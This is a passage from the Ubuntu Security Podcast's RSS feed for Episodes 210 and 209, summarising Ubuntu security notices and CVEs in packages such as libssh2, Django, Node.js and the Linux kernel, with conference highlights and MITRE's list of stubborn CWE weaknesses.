<li><a href="https://ubuntu.com/security/CVE-2023-24021">CVE-2023-24021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48279">CVE-2022-48279</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42717">CVE-2021-42717</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU-based DoS when parsing excessively nested JSON objects (needs to be
tens-of-thousands deep)</li>
<li>Mishandling of NUL byte in file uploads - would parse the filename as a string
but if it contained an embedded NUL byte then filename would be truncated and
hence could result in a buffer overread or the ability to bypass the web
application firewall for rules which read from the <code>FILES_TMP_CONTENT</code> variable</li>
<li>Mishandling of HTTP multipart requests could also allow to bypass WAF</li>
</ul>
<h3 id="usn-6371-1-libssh2-vulnerability--06-07">[<a href="https://ubuntu.com/security/notices/USN-6371-1">USN-6371-1</a>] libssh2 vulnerability (06:07)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-22218">CVE-2020-22218</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read - low impact since requires to connect to a malicious server to
trigger - and outcome is likely a DoS</li>
</ul>
<h3 id="usn-6372-1-dbus-vulnerability--06-26">[<a href="https://ubuntu.com/security/notices/USN-6372-1">USN-6372-1</a>] DBus vulnerability (06:26)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34969">CVE-2023-34969</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Ability to crash the dbus daemon by an unprivileged user - BUT only if there
is a privileged user using the in-built monitoring interface of dbus to
monitor the traffic - so low chance of being able to trigger this and the
outcome is just a DoS anyway - and will be restarted by systemd anyway</li>
</ul>
<h3 id="usn-6373-1-gawk-vulnerability--07-02">[<a href="https://ubuntu.com/security/notices/USN-6373-1">USN-6373-1</a>] gawk vulnerability (07:02)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4156">CVE-2023-4156</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap OOB read - DoS</li>
</ul>
<h3 id="usn-6374-1-mutt-vulnerabilities--07-16">[<a href="https://ubuntu.com/security/notices/USN-6374-1">USN-6374-1</a>] Mutt vulnerabilities (07:16)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4875">CVE-2023-4875</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4874">CVE-2023-4874</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different NULL ptr deref
<ul>
<li>viewing crafted email</li>
<li>composing from a specially crafted draft email</li>
<li>DoS only</li>
</ul>
</li>
</ul>
<h3 id="usn-6375-1-atftp-vulnerability--07-38">[<a href="https://ubuntu.com/security/notices/USN-6375-1">USN-6375-1</a>] atftp vulnerability (07:38)</h3>
<ul>
<li>Affecting Jammy (22.04 LTS), Lunar (23.04)</li>
<li>Could crash <code>atftpd</code> if requesting a non-existant file - turns out to be a
buffer overflow so could possibly be used for code execution</li>
</ul>
<h3 id="usn-6376-1-c-ares-vulnerability--7-50">[<a href="https://ubuntu.com/security/notices/USN-6376-1">USN-6376-1</a>] c-ares vulnerability (7:50)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-22217">CVE-2020-22217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read when parsing a crafted Start of Authority (SOA) reply</li>
</ul>
<h3 id="usn-6377-1-libraw-vulnerability--7-56">[<a href="https://ubuntu.com/security/notices/USN-6377-1">USN-6377-1</a>] LibRaw vulnerability (7:56)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-22628">CVE-2020-22628</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to reject images with invalid pixel aspect ratio - leading to an OOB
read -&gt; crash</li>
</ul>
<h3 id="usn-6378-1-django-vulnerability--08-08">[<a href="https://ubuntu.com/security/notices/USN-6378-1">USN-6378-1</a>] Django vulnerability (08:08)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41164">CVE-2023-41164</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via handling of URIs with a very large number of unicode characters -
algorithm would parse from start of string forwards for every invalid unicode
character - instead of just using the remainder of the string</li>
</ul>
<h3 id="usn-6379-1-vsftpd-vulnerability--08-47">[<a href="https://ubuntu.com/security/notices/USN-6379-1">USN-6379-1</a>] vsftpd vulnerability (08:47)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3618">CVE-2021-3618</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible application layer confusion attack (<a href="https://alpaca-attack.com/">ALPACA</a>) - abuses wildcard or
multi-domain certificates to redirect traffic from one subdomain to another</li>
</ul>
<h3 id="usn-6381-1-gnu-binutils-vulnerabilities--09-07">[<a href="https://ubuntu.com/security/notices/USN-6381-1">USN-6381-1</a>] GNU binutils vulnerabilities (09:07)</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47695">CVE-2022-47695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-44840">CVE-2022-44840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35342">CVE-2020-35342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45703">CVE-2022-45703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46174">CVE-2021-46174</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19726">CVE-2020-19726</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21490">CVE-2020-21490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19724">CVE-2020-19724</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>memory leaks in nm and when disassembling microblaze instructions -&gt; DoS</li>
<li>various buffer overflows in different functions -&gt; DoS / RCE</li>
<li>failure to zero memory -&gt; info leak</li>
<li>OOB read in objdump</li>
<li>heap buffer overflow in readelf</li>
<li>in general, we don&rsquo;t consider it safe to run binutils on untrusted inputs</li>
</ul>
<h3 id="usn-6380-1-node-dot-js-vulnerabilities--09-54">[<a href="https://ubuntu.com/security/notices/USN-6380-1">USN-6380-1</a>] Node.js vulnerabilities (09:54)</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8287">CVE-2020-8287</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8265">CVE-2020-8265</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8174">CVE-2020-8174</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15606">CVE-2019-15606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15605">CVE-2019-15605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15604">CVE-2019-15604</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>abort when sending a crafted X509 certificate -&gt; DoS</li>
<li>2 different HTTP request smuggling attacks</li>
<li>possible bypass of HTTP authorization since would include whitespace in HTTP
headers</li>
<li>couple memory corruption issues in various operations implemented in C</li>
</ul>
<h3 id="usn-6382-1-memcached-vulnerability--10-23">[<a href="https://ubuntu.com/security/notices/USN-6382-1">USN-6382-1</a>] Memcached vulnerability (10:23)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48571">CVE-2022-48571</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref upon reception of a UDP multi-packet request</li>
</ul>
<h3 id="usn-6389-1-indent-vulnerability--10-30">[<a href="https://ubuntu.com/security/notices/USN-6389-1">USN-6389-1</a>] Indent vulnerability (10:30)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40305">CVE-2023-40305</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>heap buffer overflow -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-6339-4-linux-kernel--intel-iotg--vulnerabilities--10-53">[<a href="https://ubuntu.com/security/notices/USN-6339-4">USN-6339-4</a>] Linux kernel (Intel IoTG) vulnerabilities (10:53)</h3>
<ul>
<li>8 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38429">CVE-2023-38429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38428">CVE-2023-38428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38426">CVE-2023-38426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3212">CVE-2023-3212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48425">CVE-2022-48425</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15</li>
<li>same set of vulns from <a href="/episode-209/#usn-6350-1-usn-6351-1-usn-6339-2-usn-6339-3-linux-kernel-vulnerabilities">[USN-6350-1, USN-6351-1, USN-6339-2, USN-6339-3] Linux
kernel vulnerabilities</a></li>
</ul>
<h3 id="usn-6383-1-linux-kernel-vulnerabilities--11-15">[<a href="https://ubuntu.com/security/notices/USN-6383-1">USN-6383-1</a>] Linux kernel vulnerabilities (11:15)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4569">CVE-2023-4569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21264">CVE-2023-21264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 all in 23.04, HWE in 22.04</li>
<li>speculative execution leak when performing a divide-by-zero on various AMD processors</li>
<li>possible privilege escalation in ARM64 KVM implementation -&gt; guest VM could
then write to host memory -&gt; code execution</li>
<li>UAF in L2CAP socket handling in bluetooth - local DoS / code execution</li>
<li>UAF in various network packet classifiers - local DoS via unprivileged user
namespace</li>
<li>Memory leak in netfilter - also able to be abused by an unprivileged user in a
user namespace</li>
</ul>
<h3 id="usn-6384-1-linux-kernel--oem--vulnerabilities--12-23">[<a href="https://ubuntu.com/security/notices/USN-6384-1">USN-6384-1</a>] Linux kernel (OEM) vulnerabilities (12:23)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4569">CVE-2023-4569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.1</li>
<li>speculative execution leak when performing a divide-by-zero on various AMD processors</li>
<li>Memory leak in netfilter - also able to be abused by an unprivileged user in a
user namespace</li>
</ul>
<h3 id="usn-6385-1-linux-kernel--oem--vulnerabilities--12-37">[<a href="https://ubuntu.com/security/notices/USN-6385-1">USN-6385-1</a>] Linux kernel (OEM) vulnerabilities (12:37)</h3>
<ul>
<li>37 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4569">CVE-2023-4569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4273">CVE-2023-4273</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3220">CVE-2023-3220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1206">CVE-2023-1206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4194">CVE-2023-4194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.0 OEM</li>
<li>All the previously mentioned vulns plus a heap more - kudos to OEM team and
Timo Aaltonen from the kernel team for the most number of CVEs fixed this week</li>
</ul>
<h3 id="usn-6386-1-linux-kernel-vulnerabilities--13-01">[<a href="https://ubuntu.com/security/notices/USN-6386-1">USN-6386-1</a>] Linux kernel vulnerabilities (13:01)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4569">CVE-2023-4569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 22.04 GA. 20.04 HWE</li>
</ul>
<h3 id="usn-6387-1-linux-kernel-vulnerabilities--13-08">[<a href="https://ubuntu.com/security/notices/USN-6387-1">USN-6387-1</a>] Linux kernel vulnerabilities (13:08)</h3>
<ul>
<li>3 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 20.04 GA, 18.04 HWE</li>
</ul>
<h3 id="usn-6388-1-linux-kernel-vulnerabilities--13-12">[<a href="https://ubuntu.com/security/notices/USN-6388-1">USN-6388-1</a>] Linux kernel vulnerabilities (13:12)</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4459">CVE-2023-4459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4387">CVE-2023-4387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4385">CVE-2023-4385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4128">CVE-2023-4128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-40283">CVE-2023-40283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3863">CVE-2023-3863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3212">CVE-2023-3212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 16.04 GA, 14.04 HWE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="highlights-from-lss-eu--13-29">Highlights from LSS EU (13:29)</h3>
<ul>
<li><a href="https://sched.co/1OL76">Hardware-backed Per-process Secrets - Matthew Garrett, Aurora</a>
<ul>
<li>Mark Esler described as a crystal clear explanation of how TPM works and
proposes an automated attestation for confidential computing</li>
</ul>
</li>
<li><a href="https://sched.co/1OL6x">Estimating Security Risk Through Repository Mining - Tamas K. Lengyel, Intel</a>
proposed that most common metrics don&rsquo;t demonstrate code quality, except
possibly percentage of <strong>cognitive complex functions</strong>
<ul>
<li>cyclomatic complexity measured how hard to test - cognitive complexity
tries to measure how hard to understand
<ul>
<li>premise is that if you can&rsquo;t understand it, you can&rsquo;t see the vulns</li>
</ul>
</li>
<li>intuitively makes sense, but relies on the ability actually measure
cognitive complexity
<ul>
<li>and <a href="https://www.sciencedirect.com/science/article/abs/pii/S0164121222002370">recent</a> <a href="https://arxiv.org/abs/2303.07722">studies</a> seem to show that the current cognitive complexity
measurements are no better at accurately identifying code that is hard
to understand than the more traditional methods of LOC or cyclomatic
complexity</li>
</ul>
</li>
<li><a href="https://www.sonarsource.com/docs/CognitiveComplexity.pdf">Cognitive Complexity: A new way of measuring understandability white paper by G. Ann Campbell of SonarSource</a></li>
<li>I missed this one but as Steve Beattie said, it does provide some things to
think about in the context of the security reviews that the Ubuntu Security
does as part of the MIR process (for a good overview of this, take a step
back in time to <a href="/episode-32/#main-inclusion-review-security-code-audits-discussion-with-seth-arnold">Main inclusion review security code audits discussion with
Seth Arnold from Episode 32</a>)</li>
</ul>
</li>
</ul>
<h3 id="top-25-most-stubborn-weaknesses--17-13">Top 25 most stubborn weaknesses (17:13)</h3>
<ul>
<li><a href="https://cwe.mitre.org/top25/archive/2023/2023_stubborn_weaknesses.html">https://cwe.mitre.org/top25/archive/2023/2023_stubborn_weaknesses.html</a></li>
<li><a href="/episode-201/#mitre-2023-cwe-top-25-most-dangerous-software-weaknesses-published--06-20">MITRE 2023 CWE Top 25 Most Dangerous Software Weaknesses published from Episode 201</a></li>
<li>15 CWEs present in every one of the last 5 top 25 most dangerous lists from MITRE</li>
</ul>
<table>
  <thead>
      <tr>
          <th>CWE-ID</th>
          <th>Description</th>
          <th>2023 Rank</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>CWE-787</td>
          <td>Out-of-bounds Write</td>
          <td>1</td>
      </tr>
      <tr>
          <td>CWE-79</td>
          <td>Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</td>
          <td>2</td>
      </tr>
      <tr>
          <td>CWE-89</td>
          <td>Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)</td>
          <td>3</td>
      </tr>
      <tr>
          <td>CWE-416</td>
          <td>Use After Free</td>
          <td>4</td>
      </tr>
      <tr>
          <td>CWE-78</td>
          <td>Improper Neutralization of Special Elements used in an OS Command (&lsquo;OS Command Injection&rsquo;)</td>
          <td>5</td>
      </tr>
      <tr>
          <td>CWE-20</td>
          <td>Improper Input Validation</td>
          <td>6</td>
      </tr>
      <tr>
          <td>CWE-125</td>
          <td>Out-of-bounds Read</td>
          <td>7</td>
      </tr>
      <tr>
          <td>CWE-22</td>
          <td>Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)</td>
          <td>8</td>
      </tr>
      <tr>
          <td>CWE-352</td>
          <td>Cross-Site Request Forgery (CSRF)</td>
          <td>9</td>
      </tr>
      <tr>
          <td>CWE-476</td>
          <td>NULL Pointer Dereference</td>
          <td>12</td>
      </tr>
      <tr>
          <td>CWE-287</td>
          <td>Improper Authentication</td>
          <td>13</td>
      </tr>
      <tr>
          <td>CWE-190</td>
          <td>Integer Overflow or Wraparound</td>
          <td>14</td>
      </tr>
      <tr>
          <td>CWE-502</td>
          <td>Deserialization of Untrusted Data</td>
          <td>15</td>
      </tr>
      <tr>
          <td>CWE-119</td>
          <td>Improper Restriction of Operations within Bounds of a Memory Buffer</td>
          <td>17</td>
      </tr>
      <tr>
          <td>CWE-798</td>
          <td>Use of Hard-coded Credentials</td>
          <td>18</td>
      </tr>
  </tbody>
</table>
<ul>
<li>all fall into one of three different categories
<ul>
<li>errors when processing of data from untrusted sources providing an initial
entry point for compromise</li>
<li>weaknesses from using languages that don&rsquo;t provide strong memory safety
guarantees</li>
<li>poor security architecture / design choices</li>
</ul>
</li>
<li>re memory safety - MITRE note that this has been coming down - CWE-119
(&ldquo;Improper Restriction of Operations within Bounds of a Memory Buffer&rdquo;) was
once ranked 1 5 years ago, is now 17. Related (but not directly memory safety
but more correctness) CWE-190 (&ldquo;Integer Overflow or Wraparound&rdquo;) was ranked 5,
is now 7.</li>
<li>Really shows that if you are implementing any new code, choosing a language
that is memory safe will help avoid a lot of the most prevalent security
issues - clearly won&rsquo;t help with lack of proper input validation or poor
security architecture etc - but will cut out the most dangerous and most
stubborn issues (OOB W, UAF etc)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E210.mp3" length="36992861" type="audio/mpeg" /><itunes:duration>1280</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 209
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-209/</link>
          <pubDate>Fri, 15 Sep 2023 22:12:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>c3d31ac5077a301d17fc6350fea73d569b91c919ad72b80c6bed467349740d83eb8f97509602d8c337630c3230cd38e1f98761f64e176433c7121ae498ca4ed2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 209</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Andrei is back this week with a deep dive into recent research around CVSS
  scoring inconsistencies, plus we look at a recent Ubuntu blog post on the
  internals of package updates and the repositories, and we cover security updates
  in...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Andrei is back this week with a deep dive into recent research around CVSS
  scoring inconsistencies, plus we look at a recent Ubuntu blog post on the
  internals of package updates and the repositories, and we cover security updates
  in Apache Shiro, GRUB2, CUPS, RedCloth, curl and more.
  </itunes:summary>
        <description>  Andrei is back this week with a deep dive into recent research around CVSS
  scoring inconsistencies, plus we look at a recent Ubuntu blog post on the
  internals of package updates and the repositories, and we cover security updates
  in Apache Shiro, GRUB2, CUPS, RedCloth, curl and more.
  </description>
        <googleplay:description>  Andrei is back this week with a deep dive into recent research around CVSS
  scoring inconsistencies, plus we look at a recent Ubuntu blog post on the
  internals of package updates and the repositories, and we cover security updates
  in Apache Shiro, GRUB2, CUPS, RedCloth, curl and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Andrei is back this week with a deep dive into recent research around CVSS
scoring inconsistencies, plus we look at a recent Ubuntu blog post on the
internals of package updates and the repositories, and we cover security updates
in Apache Shiro, GRUB2, CUPS, RedCloth, curl and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>77 unique CVEs addressed</p>
<h3 id="usn-6346-1-linux-kernel--raspberry-pi--vulnerabilities--00-55">[<a href="https://ubuntu.com/security/notices/USN-6346-1">USN-6346-1</a>] Linux kernel (Raspberry Pi) vulnerabilities (00:55)</h3>
<ul>
<li>5 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 raspi + HWE on 18.04</li>
<li>Covered previously in <a href="/episode-207/#usn-6315-1-linux-kernel-vulnerabilities--06-58">[USN-6315-1] Linux kernel vulnerabilities from Episode 207</a></li>
</ul>
<h3 id="usn-6347-1-linux-kernel--azure-cvm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6347-1">USN-6347-1</a>] Linux kernel (Azure CVM) vulnerabilities</h3>
<ul>
<li>24 CVEs addressed in Focal (20.04 LTS)
<ul>
